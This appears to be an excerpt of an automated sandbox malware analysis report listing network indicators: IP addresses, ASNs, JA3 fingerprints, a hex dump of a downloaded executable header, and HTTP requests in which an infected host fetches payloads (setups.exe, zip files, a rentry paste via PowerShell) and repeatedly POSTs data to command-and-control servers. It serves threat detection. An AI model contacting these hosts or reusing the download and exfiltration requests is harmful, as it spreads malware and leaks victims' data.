Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 799

Source: unknown

Network traffic detected: IP country count 11

Source: global traffic	TCP traffic: 192.168.2.10:49703 -> 44.221.84.105:799
Source: global traffic	TCP traffic: 192.168.2.10:49784 -> 193.222.96.24:4449
Source: global traffic	TCP traffic: 192.168.2.10:49821 -> 94.156.79.190:4449

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 24 Jul 2024 17:56:24 GMTServer: ApacheLast-Modified: Mon, 22 Jul 2024 19:29:34 GMTETag: "f1600-61ddb109e6b16"Accept-Ranges: bytesContent-Length: 988672Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 05 00 6c 5a 41 03 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 00 00 00 c0 08 00 00 5c 06 00 00 00 00 00 c0 5a 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 0f 00 00 04 00 00 00 00 00 00 03 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 78 10 0f 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0f 00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 c0 08 00 00 10 00 00 00 c0 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 00 50 06 00 00 d0 08 00 00 4c 06 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 30 00 00 00 20 0f 00 00 02 00 00 00 10 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 00 10 00 00 00 50 0f 00 00 02 00 00 00 12 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 58 00 00 00 00 60 0f 00 00 02 00 00 00 14 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: Joe Sandbox View	IP Address: 77.221.157.163 77.221.157.163
Source: Joe Sandbox View	IP Address: 107.173.160.139 107.173.160.139
Source: Joe Sandbox View	IP Address: 107.173.160.137 107.173.160.137

Source: Joe Sandbox View	ASN Name: INFOBOX-ASInfoboxruAutonomousSystemRU INFOBOX-ASInfoboxruAutonomousSystemRU
Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: LGDACOMLGDACOMCorporationKR LGDACOMLGDACOMCorporationKR

Source: Joe Sandbox View	JA3 fingerprint: a6c95ef2da5b759f65c60665167952ee
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: GET /wp-content/images/pic1.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: mussangroup.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 7627
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 139784
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1143
Source: global traffic	HTTP traffic detected: GET /setups.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: funrecipebooks.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1143
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: callosallsaospz.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: callosallsaospz.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: GET /microgods/raw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-CH) WindowsPowerShell/5.1.19041.1682Host: rentry.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12842Host: callosallsaospz.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15069Host: callosallsaospz.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: GET /download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: store4.gofile.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20431Host: callosallsaospz.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1225Host: callosallsaospz.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 551715Host: callosallsaospz.shop
Source: global traffic	HTTP traffic detected: GET /download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: store4.gofile.io
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: callosallsaospz.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: liernessfornicsa.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: liernessfornicsa.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12842Host: liernessfornicsa.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15069Host: liernessfornicsa.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20431Host: liernessfornicsa.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1232Host: liernessfornicsa.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 531309Host: liernessfornicsa.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: liernessfornicsa.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: liernessfornicsa.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
